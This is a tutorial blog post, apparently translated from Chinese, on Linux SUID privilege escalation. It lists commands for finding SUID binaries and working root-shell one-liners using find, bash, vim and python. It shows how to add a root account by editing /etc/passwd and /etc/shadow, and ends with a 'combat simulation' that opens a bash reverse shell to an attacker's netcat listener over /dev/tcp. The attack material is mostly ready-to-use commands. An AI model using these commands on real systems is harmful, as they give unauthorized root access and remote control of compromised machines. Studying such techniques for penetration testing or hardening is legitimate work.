series of articles
Operating system privilege escalation (18) Linux privilege escalation - kernel privilege escalation
SUID privilege escalation
Introduction to SUID
SUID is a special authority. For a program file with suid set, when the user executes the program, the user's authority is the authority of the owner of the program file. For example, the owner of the program file is root, then the user who executes the program will be Temporarily gain access to the root account. sgid is similar to suid, except that when the program is executed, the permission of the file belongs to the group is obtained. The permission setting of the passwd command program, it is set with suid permission
Note the following points:
- Only executable binary program files can set SUID permissions, and it does not make sense to set SUID permissions for non-binary files.
- The command executor must have execute (x) permission on the program file.
- The command executor obtains the identity of the owner of the program file when executing the program.
- SUID permission is only valid during the execution of the program, that is to say, the identity change is only valid during the execution of the program
Set SUID
chmod u+s filename 设置SUID位
chmod u-s filename 去掉SUID设置
The principle of SUID privilege escalation
Principle: Use some binary files to set SUID permissions, so as to execute system commands with root permissions
Common commands that can be used to elevate privileges are as follows:
nmap
vim
find
bash
more
less
nano
cp
awk
mv
更多命令查看:https://gtfobins.github.io
Find SUID file
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls {
} \; 2>/dev/null
one,find / -user root -perm -4000 -print 2>/dev/null
1. find is the command to find files
2, / is to start searching from the root directory
3. -user root is the owner of the file is root
4、-perm -4000
-perm匹配权限
4000 2000 1000分别表示SUID SGID SBIT
1.普通文件,文件的权限一般三位,777最高文件权限
-perm -0777搜索的就是最高权限的文件rwxrwxrwx
-perm +0777搜索的只要包含rwxrwxrwx任意一个的文件
2.特殊文件,包含权限位置四位,7000为最高,即–s–s–t,同样的方法
-perm -7000搜索的就是最高权限的文件–s–s–t
-perm +7000搜索的只要包含–s–s–t任意一个的文件,–s — —(4000)、— –s —(2000)、— — – t(1000)等
5. -print 2>/dev/null input standard error to /dev/null file
two,find / -perm -u=s -type f 2>/dev/null
1. find is the command to find files
2, / is to start searching from the root directory
3. -perm -u=s Find s permissions
4. -type f -type b/d/c/p/l/f Check block devices, directories, character devices, pipes, symbolic links, ordinary files
three,find / -user root -perm -4000 -exec ls -ldb {};
1. find is the command to find files
2, / is to start searching from the root directory
3. -user root is the owner of the file is root
4、-perm -4000
5. -exec ls -ldb {}; execute ls -ddb command
privilege escalation experiment
FIND privilege escalation
find is more commonly used, and find is used to find files in the system. At the same time, it also has the ability to execute commands. Therefore, if it is configured to run with SUID privileges, all commands that can be executed through find will be run as root
1. Find the SUID file
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls {
} \; 2>/dev/null
2. Use find to escalate rights
touch anyfile #必须要有这个文件
find anyfile -exec whoami \;
find . -exec /bin/sh -p \; -quit
BASH privilege escalation
The bash command is used to open a shell. It also has the ability to execute commands. Therefore, if configured to run with SUID privileges, all commands that can be executed through bash will be run as root
1. Find the SUID file
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls {
} \; 2>/dev/null
2. Use bash to escalate privileges
bash -p
VIM privilege escalation
The idea of using vim to escalate rights is to modify the /etc/passwd file and /etc/shadow to add a user with root privileges for yourself
1. Find the SUID file
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls {
} \; 2>/dev/null
2. Use bash to escalate privileges
The first way is to use vim to add an account
vim /etc/passwd 添加特权用户
添加:bob:x:0:0::/home/bob:/bin/bash
vim /etc/shadow 添加特权用户
bob:$1$salt$638tR8bROOvPnPklDQ9Vf/:19103:0:99999:7::: 密码是123456
Finally we switch to bob user
The second is to use vim to open an interactive shell
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
PYTHON privilege escalation
1. Find the SUID file
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls {
} \; 2>/dev/null
2. Take advantage of privilege escalation
python -c 'import os;os.execl("/bin/sh", "sh", "-p")'
You can use this article to learn more about SUID privilege escalation and talk about Linux and suid privilege escalation
Combat simulation
machine name | IP |
---|---|
kali | 192.168.0.105 |
Unbuntu | 192.168.41.27 |
In the early stage, we have taken down the Unbuntu machine through various channels, and found that it is an ordinary user daoer's authority
Next, we use SUID to escalate rights
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls {
} \; 2>/dev/null
Find commands that can use SUID to escalate privileges on the target machine
touch anyfile #必须要有这个文件
find anyfile -exec whoami \;
find . -exec /bin/sh -p \; -quit
After completing the privilege escalation, the kali machine starts monitoring and rebounds the shell
nc -lvvp 8888
bash -i >&/dev/tcp/192.168.0.105/8888 0>&1
The kali machine receives a rebound shell